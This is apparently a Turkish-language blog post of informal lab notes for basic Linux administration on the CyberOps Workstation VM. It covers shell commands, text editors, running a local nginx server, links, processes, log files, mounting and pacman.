Siber Güvenlik Analisti Eğitmen eğitimimiz hızla devam etmekte. Bu kapsamda Linux becerilerimiz geliştirmek adına yaptığımız lab çalışmasını sizler ile paylaşmak istedim.

Lab Uygulama Kodları
Linux LAB Notes:
CyberOps Workstation VM is based on Arch Linux: lightweight, minimalist and simple.
0 – Network Settings
———————————————
ls la
ifconfig
ls lab.support.files/scripts
cd ..
ls lab.support.files/scripts/
cat configure_as_dhcp.sh
sudo ./lab.support.files/scripts/configure_as_static.sh
ifconfig
sudo cat ./lab.support.files/scripts/configure_as_static.sh
history
I – Working in the CLI
- Basic Commands
man ls
pwd
ls -l #show permission
ls -a #show hidden file
ls -al
cd ..
cd /etc/ # go etc
cd /home/analyst/ # go analyst
cd ~ #current directory
mkdir belgelerim
ls
cd belgelerim
tocuh dosya.txt
cp # copy commands
mv # move or rename file
echo “hakan” > dosya.txt # override üzerine yaz
echo “hakan” >> dosya.txt # eof add
- vi or vim or nano
vi dosya.txt
vi Komut Modunda en çok kullanilan komutlar sunlardir:
Komut Eylem
i Edit Moduna geçis yapar
a Imlecin sonunda edit moduna geçer
A Imlecin bulundugu satirin sonunda edit moduna geçer
ESC Edit Modunu kapatir
u Geri Al
U Tümünü geri al
o yeni satir aç
dd Satir sil
/kelime “kelime” için arama yapar
n Aranan kelimenin ilerleyerek arama
:wq! # write quit exit
tail # default 10 lines
head # default 10 lines
nano dosya.txt
CTRL+O saves the current file;
CTRL+W opens the search menu.
After nano is open, for Help press CTRL+G
scite dosya.txt
3.List /etc files & permissions
ls -la /etc
.conf configuration files relating to system-wide services are place in the /etc directory
ls | grep conf
cat /etc/./bashrc (user behavior file)
Linux dagitimlarinda kullanicilarin terminal oturumunu kullanirken hazir olarak çalismasini istedigi
komutlarin içerdigi bir dosyadir.
bashrc Kullanim Amaci
– Oturum açan kullanicinin kendine ait komutlari çalistirabilir.
– Ortam degiskenlerini buraya yazabilir.
http://web.deu.edu.tr/doc/lis/lis-6.html
For example, the line PS1='[\e[1;32m][\u@\h\W]\$[\e[0m] ‘ defines the prompt structure.
For example, change 32m to 31m and the command prompt color will change.
Linux çok kullanicili bir isletim sistemi oldugundan,
kullanici uygulamasi yapilandirma dosyalarini /etc altina yerlestirmek
kullanicilarin uygulamalarini özellestirmesini engeller.
- Editing Configuration Files for Services
~~~~~~~~~~~
Rus Yazilim Mühendisi Igor tarafindan mail.ru için yazilan bir
web server dir.
sudo nano -l /etc/nginx/custom_server.conf
P.S: Lines that start with ‘#’ are comments and are ignored by nginx.
On line 36, change the port number from 81 to 8080.
On line 44 and change the path
from /usr/share/nginx/html/ to /home/analyst/lab.support.files/
sudo nginx -c /etc/nginx/custom_server.conf -g “pid /var/run/nginx_v.pid;”
(to tell nginx what file to use when storing the process
ID that identifies this instance of nginx.)
Open Firefox and enter 127.0.0.1:8080
To stop the nginx server:
sudo pkill nginx
Start the nginx server
sudo nginx -c custom_server.conf
sudo nano -l /etc/nginx/custom_server.conf
sudo pkill nginx
sudo pkill nginx
sudo nginx -c /etc/nginx/custom_server.conf -g “pid /var/run/nginx_v.pid;”
ps ax | grep nginx
wget http://127.0.0.1:8080
telnet 127.0.0.1 80
unable yazar
telnet 127.0.0.1 8080
erisiliyor
pstree
II – (3127) Getting Familiar with the Linux Shell:
A hard link is another file that points to the same location as the original file
Hard and softlinks: edit in both are replicated, only if u remove original, hardlnk persists
sudo ln dosya.txt hardDosya #hardlinkedfile
ln –s dosya.txt softDosya #Softinkedfile
Changes are replicated on both
mv file newfile
cat hardDosya
cat: Softinkedfile: no such file or directory
Examin file types:
ls -l /dev/
- Block files (b)
- Character device files (c)
- Pipe files (p)
- Symbolic Link files (l)
- Socket files (s)
III – (3134) Linux Servers:
6.Processes related commands
ps –elf
(e all proc, l long format, f ASCII art forest)
ps -ejH
Use –ejH options to display the currently running process tree (indentation.)
ps -elf | grep
shows user who launched servers through which commands, notice grep command listed last as well
netstat -tunap
-a: shows both listen and non-listening sockets.
-n: use numeric output (no DNS, service port or username resolution),
-p: show the PID of the connection owner process.
-t: shows TCP connections.
–u: shows UDP connections
IV -(3214) Lab – Locating Log Files:
Security Info:
-Günlük dosyalari sorun giderme için son derece önemlidir.
-Günlük dosyasi konumu, belgelere dahil edilen veya aranan kurali takip eder.
-Tüm sistemlerin dogru zamana sahip olmasini saglamak için saatler her zaman senkronize edilmelidir.
8.Open an existing Log:
cat /var/log/logstash-tutorial.log
sudo more /var/log/messages
(show network flapping Wednesday, March 20nd, 14:28:33 through 14:29:05 (lines 5 – 12) the)
man nginx (shows: error_log /path/to/log debug; %%CONF_PATH%%; %%ERROR_LOG_PATH%%)
If nginx is not running, enter the sudo /usr/sbin/nginx
To start nginx with the custom configuration:
sudo nginx -c custom_server.conf
check if running by URL or by:
ps ax | grep nginx
ls -l /var/log/
As shown above, the /var/log directory has a subdirectory named nginx. Use the ls command again to
list the contents of /var/log/nginx.
sudo ls -l /var/log/nginx
- Monitoring Log files in Real Time
tail /var/log/nginx/access.log
sudo tail –n 5 /var/log/nginx/access.log
sudo tail -f /var/log/nginx/access.log (open browser, firefox to reload with no cache)
V – (3224) Navigating the Linux Filesystem and Permission Settings:
10 show mounted filesystems
mount
to display all block devices:
lsblk
- Mount existing device to directory
mkdir second_drive
ls -l second_drive/ >> empty
sudo mount /dev/sdb1 ~/second_drive/
ls -l second_drive/ >> filled
After the mount, /home/analyst/second_drive becomes the entry point to the filesystem physically stored in /dev/sdb1.
mount | grep sd
sudo umount /dev/sdb1
ls -l second_drive/ >> empty
Miscellaneous:
12.pacman
pacman in Archlinux like apt in Ubuntu for automating software uinstallation/removal
sudo pacman -Sy (y to synch, u to upgrade)
To remove a single package, leaving all of its dependencies installed:
pacman -R package_name
To install a single package with all of its dependencies installed:
sudo pacman -S package_name
cat /var/log/messages | grep http